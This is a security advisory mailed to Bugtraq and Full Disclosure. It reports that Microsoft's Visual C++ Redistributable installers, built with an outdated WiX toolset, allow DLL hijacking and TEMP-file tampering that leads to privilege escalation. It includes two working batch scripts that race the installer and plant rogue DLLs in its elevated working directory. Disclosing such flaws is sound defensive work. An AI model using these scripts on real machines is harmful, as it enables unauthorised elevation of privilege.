Defense in depth -- the Microsoft way (part 57): all the latest MSVCRT installers allow escalation of privilege

From: Stefan Kanthak <stefan.kanthak@nexgo.de>
To: bugtraq@securityfocus.com
Cc: fulldisclosure@seclists.org
Subject: Defense in depth -- the Microsoft way (part 57): all the latest MSVCRT installers allow escalation of privilege
Date:


Hi @ll,

about 6 weeks ago, Microsoft updated their MSKB article
<https://support.microsoft.com/en-us/help/2977003/the-latest-supported-visual-c-downloads>,
listing the current/lastest downloads of their MSVCRT alias
Microsoft Visual C++ Redistributable for Visual Studio 201x


Guess what Microsoft used to build the executable installers
offered on that page: COMPLETELY outdated versions 3.7.3813.0
(and before) of Wix Toolset, which NOBODY with a sane mind
should but use any more due to their vulnerabilities (some of
which are fixed in later/current versions)!

<https://www.firegiant.com/blog/2016/1/20/wix-v3.10.2-released/>
gives enough reason to drop these OUTDATED versions!


Everybody interested in the dirty details should take a look at
the executable installer offered via the first direct download
link <https://aka.ms/vs/15/release/vc_redist.x86.exe>


Take 1:
~~~~~~~

| C:\Users\Stefan\Downloads>CURL.exe -q -I -L https://aka.ms/vs/15/release/vc_redist.x86.exe
...
| Last-Modified: Tue, 22 May 2018 17:35:06 GMT

The installer is quite new, published about 10 weeks ago.


Take 2:
~~~~~~~

| C:\Users\Stefan\Downloads>SIGNTOOL.exe Verify /V vc_redist.x86.exe
...
| The signature is timestamped: Tue May 15 08:08:31 2018

The installer was built or digitally signed about 11 weeks ago,
just one week prior to its release.


Take 3:
~~~~~~~

| C:\Users\Stefan\Downloads>FILEVER.exe /V vc_redist.x86.exe
| --a-- W32i   APP ENU   14.14.26429.4 shp 14,611,496 05-22-2018 vc_redist.x86.exe
|
|        Language        0x0409 (Englisch (USA))
|        CharSet         0x04e4 Windows, Multilingual
|        OleSelfRegister Disabled
|        CompanyName     Microsoft Corporation
|        FileDescription Microsoft Visual C++ 2017 Redistributable (x86) - 14.14.26429
|        InternalName    setup
|        OriginalFilenam VC_redist.x86.exe
|        ProductName     Microsoft Visual C++ 2017 Redistributable (x86) - 14.14.26429
|        ProductVersion  14.14.26429.4
|        FileVersion     14.14.26429
|        LegalCopyright  Copyright (c) Microsoft Corporation. All rights reserved.


Take 4:
~~~~~~~

| C:\Users\Stefan\Downloads>LINK.exe /DUMP /HEADERS /DEPENDENTS vc_redist.x86.exe
...
| FILE HEADER VALUES
|              14C machine (x86)
|                7 number of sections
|         54DE53A8 time date stamp Fri Feb 13 20:42:32 2015
                                   ~~~~~~~~~~~~~~~~~~~~~~~~

WTF?
The executable was built about 3.5 YEARS ago!

JFTR: the build date of the executable matches that of the release
      of Wix Toolset 3.7 (see below).

Microsoft builds their CURRENT executable installers from outdated
CRAP and dares to ship them to hundreds of millions of customers,
where their well-known vulnerabilities can be exploited!

Microsoft's mantra "Keep your PC up-to-date", which they tell all
their customers/users over and over again, is obviously unheard in
Redmond, especially not followed on Microsoft's production systems!


Take 4, continued:
~~~~~~~~~~~~~~~~~~

| OPTIONAL HEADER VALUES
|              10B magic # (PE32)
|            10.00 linker version
             ~~~~~
...
|             5.01 operating system version
|             0.00 image version
|             5.01 subsystem version
              ~~~~

The executable installer was built with Visual Studio 2010, for use on
Windows XP and newer versions of Windows NT.

If only someone had told Redmond's tinkerers that Windows XP went out
of support in April 2014...

JFTR: April 14, 2014 happened to be 10 months before February 13, 2015!


Take 4, continued:
~~~~~~~~~~~~~~~~~~

|  Image has the following dependencies:
|
|    gdiplus.dll
|    ADVAPI32.dll
|    USER32.dll
|    OLEAUT32.dll
|    GDI32.dll
|    SHELL32.dll
|    ole32.dll
|    KERNEL32.dll
|    Cabinet.dll
|    CRYPT32.dll
|    msi.dll
|    RPCRT4.dll
|    WININET.dll
|    WINTRUST.dll
|    VERSION.dll

Each of these DLLs not treated as "known DLL" on the version of Windows
this executable installer will run on will be loaded from the programs
"application directory" and their entry point routine called BEFORE the
program's entry point routine, allowing to compromise the installation
COMPLETELY!


Take 4, continued:
~~~~~~~~~~~~~~~~~~

|  Debug Directories
|
|        Time Type       Size      RVA  Pointer
|    -------- ------ -------- -------- --------
|    54DE53A8 cv           46 00052F60    51760 ... E:\delivery\Dev\wix37\build\ship\x86\burn.pdb
                                                                    ~~~~~

This gives the main version of the Wix Toolset used to build the
vulnerable executable installer: 3.7


Take 5:
~~~~~~~

Using this information we can determine the full version:

| C:\Users\Stefan\Downloads>FIND.exe "3.7" vc_redist.x86.exe
| 3.7.3813.0
...

Did I already tell that this version is COMPLETELY outdated, creates
VULNERABLE installers, and SHOULD NOT be used any more?
<https://www.firegiant.com/blog/2016/1/20/wix-v3.10.2-released/>


Take 6:
~~~~~~~

The embedded "application manifest" can also be found and printed:

| C:\Users\Stefan\Downloads>FIND.exe "WiX" vc_redist.x86.exe
...
| <description>WiX Toolset Bootstrapper</description>
...
| <requestedExecutionLevel level="asInvoker" uiAccess="false"></requestedExecutionLevel>
                                  ~~~~~~~~~

The executable will be run with the credentials of its caller.

This but means that all files extracted/copied to %TEMP% and below
(or any other subdirectory) are UNPROTECTED, every process running
under the same user account can tamper with these files!


Take 7:
~~~~~~~

| C:\Users\Stefan\Downloads>vc_redist.x86.exe

Running on a fully patched Windows 7 SP1, the program loads at least
the following DLLs from its "application directory", executing their
entry point routine with the credentials of the caller:

    UXTheme.dll, Cabinet.dll, MSI.dll, Version.dll,
    WindowsCodecs.dll, MSLS31.dll, PropSys.dll, NTMARTA.dll,
    CryptSP.dll, RPCRtRemote.dll, Secur32.dll, MPR.dll

For this well-known and well-documented vulnerability see
<https://cwe.mitre.org/data/definitions/426.html> and
<https://cwe.mitre.org/data/definitions/427.html> plus
<https://capec.mitre.org/data/definitions/471.html>.

See <https://skanthak.homepage.t-online.de/minesweeper.html> for the
instructions to build these DLLs.
For the following takes, I assume that these DLLs have been placed
into the user's "Downloads" directory.


Take 7, continued:
~~~~~~~~~~~~~~~~~~

Running with the callers credentials, the program creates a
subdirectory {2019b6a0-8533-4a04-ac0e-b2c10bdb9841} (notice the
HARD-CODED name) in the user's %TEMP% directory: this subdirectory
inherits the NTFS ACL from its parent %TEMP%, allowing full access
for the current/owning user.
Under this subdirectory it creates several more subdirectories and
extracts multiple files, especially wixstdba.dll, which it loads
afterwards, and a copy of itself, which it executes afterwards,
ELEVATED:

%TEMP%\{2019b6a0-8533-4a04-ac0e-b2c10bdb9841}\.ba1\wixstdba.dll
%TEMP%\{2019b6a0-8533-4a04-ac0e-b2c10bdb9841}\.be\vc_redist.x86.exe

For this well-known and well-documented vulnerability see
<https://cwe.mitre.org/data/definitions/377.html> and
<https://cwe.mitre.org/data/definitions/379.html> plus
<https://capec.mitre.org/data/definitions/29.html>


Take 7, continued:
~~~~~~~~~~~~~~~~~~

Due to the inherited full access any process running in the same
user account can tamper with these unprotected files between their
creation and use, for example with the following batch scripts:

--- wixstdba.cmd ---
:wixstdba
@If Not Exist "%TEMP%\{2019b6a0-8533-4a04-ac0e-b2c10bdb9841}\.ba1\1028" Goto :wixstdba

Copy "%USERPROFILE%\Downloads\dlldummy.dll" "%TEMP%\{2019b6a0-8533-4a04-ac0e-b2c10bdb9841}\.ba1\wixstdba.dll"
--- eof ---

--- wixstdbe.cmd ---
:wixstdbe
@If Not Exist "%TEMP%\{2019b6a0-8533-4a04-ac0e-b2c10bdb9841}\.be" Goto :wixstdbe

For %%! In (Version MSI Cabinet UXTheme WindowsCodecs MSLS31 PropSys NTMARTA CryptSP RPCRtRemote Secur32 MPR) Do Copy
"%USERPROFILE%\Downloads\%%!.dll" "%TEMP%\{2019b6a0-8533-4a04-ac0e-b2c10bdb9841}\.be"
--- eof ---


Take 8:
~~~~~~~

Running ELEVATED, the program's copy
%TEMP%\{2019b6a0-8533-4a04-ac0e-b2c10bdb9841}\.be\vc_redist.x86.exe
loads the rogue DLLs copied by the second batch script, executing
their entry point routines with ELEVATED rights: GAME OVER!


Mitigation:
~~~~~~~~~~~

* DONT use executable installers!

* NEVER run executable installers in unsafe environments!


Fix:
~~~~

* DUMP executable installers, use *.MSI or *.INF plus *.CAB!


stay tuned
Stefan Kanthak





Copyright © 1995-2018 LinuxRocket.net. All rights reserved.